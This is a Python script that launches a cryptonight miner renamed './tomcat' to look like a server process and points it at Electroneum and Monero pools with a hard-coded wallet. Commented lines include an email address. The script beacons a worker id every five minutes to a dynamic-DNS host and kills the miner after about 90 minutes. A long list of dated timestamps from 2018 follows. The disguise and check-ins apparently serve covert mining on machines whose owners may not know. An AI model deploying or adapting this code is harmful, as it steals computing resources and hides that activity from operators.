import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:26:04.843843
#2018-02-17 16:14:05.191692
#2018-02-17 18:02:04.329849
#2018-02-17 19:49:05.513703
#2018-02-17 21:36:01.449275
#2018-02-17 23:20:08.857483
#2018-02-18 01:08:04.188978
#2018-02-18 02:56:07.419374
#2018-02-18 04:44:03.677857
#2018-02-18 06:36:06.218221
#2018-02-18 08:24:07.030004
#2018-02-18 10:13:01.387395
#2018-02-18 11:59:04.433360
#2018-02-18 13:43:06.176158
#2018-02-18 15:35:04.053420
#2018-02-18 17:22:07.347905
#2018-02-18 19:11:06.122331
#2018-02-18 20:57:04.982532
#2018-02-18 22:44:01.880547
#2018-02-19 00:33:04.912014
#2018-02-19 02:18:06.701081
#2018-02-19 04:05:04.155538
#2018-02-19 05:49:06.056693
#2018-02-19 07:38:06.945369
#2018-02-19 09:28:04.759275
#2018-02-19 11:17:04.043202
#2018-02-19 13:05:09.746256
#2018-02-19 14:53:07.606816
#2018-02-19 16:41:09.502164
#2018-02-19 18:28:03.010891
#2018-02-19 20:13:05.394197
#2018-02-19 22:04:07.730774
#2018-02-19 23:51:01.487877
#2018-02-20 01:37:07.840783
#2018-02-20 03:25:07.621560
#2018-02-20 05:12:03.765089
#2018-02-20 06:55:06.301775
#2018-02-20 08:41:09.060021
#2018-02-20 10:25:04.234601
#2018-02-20 12:10:08.725800
#2018-02-20 13:57:07.493953
#2018-02-20 15:40:10.421252
#2018-02-20 17:27:01.621092
#2018-02-20 19:16:01.578214
#2018-02-20 21:04:07.449123
#2018-02-20 22:50:05.374391
#2018-02-21 00:34:01.747579
#2018-02-21 02:19:06.469716
#2018-02-21 04:06:05.883997
#2018-02-21 05:52:07.566510
#2018-02-21 07:40:03.918660
#2018-02-21 09:24:06.732220
#2018-02-21 11:13:01.699463
#2018-02-21 13:00:06.280694
#2018-02-21 14:47:04.516343
#2018-02-21 16:36:07.375764
#2018-02-21 18:26:08.251210
#2018-02-21 20:13:08.086955
#2018-02-21 22:03:03.986421
#2018-02-21 23:31:06.828409
#2018-02-22 01:13:03.750306
#2018-02-22 02:46:05.104502
#2018-02-22 04:16:07.482875
#2018-02-22 05:49:05.577292
#2018-02-22 07:22:01.385800
#2018-02-22 08:55:04.195969
#2018-02-22 10:29:04.768020
#2018-02-22 12:00:01.517101
#2018-02-22 13:35:03.137233
#2018-02-22 15:11:06.878699
#2018-02-22 16:41:01.845015
#2018-02-22 18:16:09.171400
#2018-02-22 19:51:04.349964
#2018-02-22 21:29:05.601232
#2018-02-22 22:55:01.532749
#2018-02-23 00:29:03.817396
#2018-02-23 02:03:08.122891
#2018-02-23 03:39:05.939752
#2018-02-23 05:17:07.496942
#2018-02-23 06:52:05.070034
#2018-02-23 08:31:01.718698
#2018-02-23 10:29:01.707994
#2018-02-23 11:52:06.361169
#2018-02-23 13:23:08.144121
#2018-02-23 14:51:05.992719
#2018-02-23 16:29:08.361207
#2018-02-23 17:57:09.264616
#2018-02-23 19:34:08.166031
#2018-02-23 21:03:09.312438
#2018-02-23 22:40:07.550131
#2018-02-24 00:16:06.164501
#2018-02-24 01:53:03.550846
#2018-02-24 03:26:06.313884
#2018-02-24 04:55:08.441976
#2018-02-24 06:27:04.499860
#2018-02-24 08:04:03.478006
#2018-02-24 09:29:01.713250
#2018-02-24 11:16:05.327012
#2018-02-24 12:44:02.148273
#2018-02-24 14:21:07.682304
#2018-02-24 15:53:04.435831
#2018-02-24 17:33:01.779637
#2018-02-24 19:02:04.830343
#2018-02-24 20:34:03.540940
#2018-02-24 22:08:08.026166
#2018-02-25 02:04:01.969643
#2018-02-25 05:39:04.380934
#2018-02-25 11:35:08.378050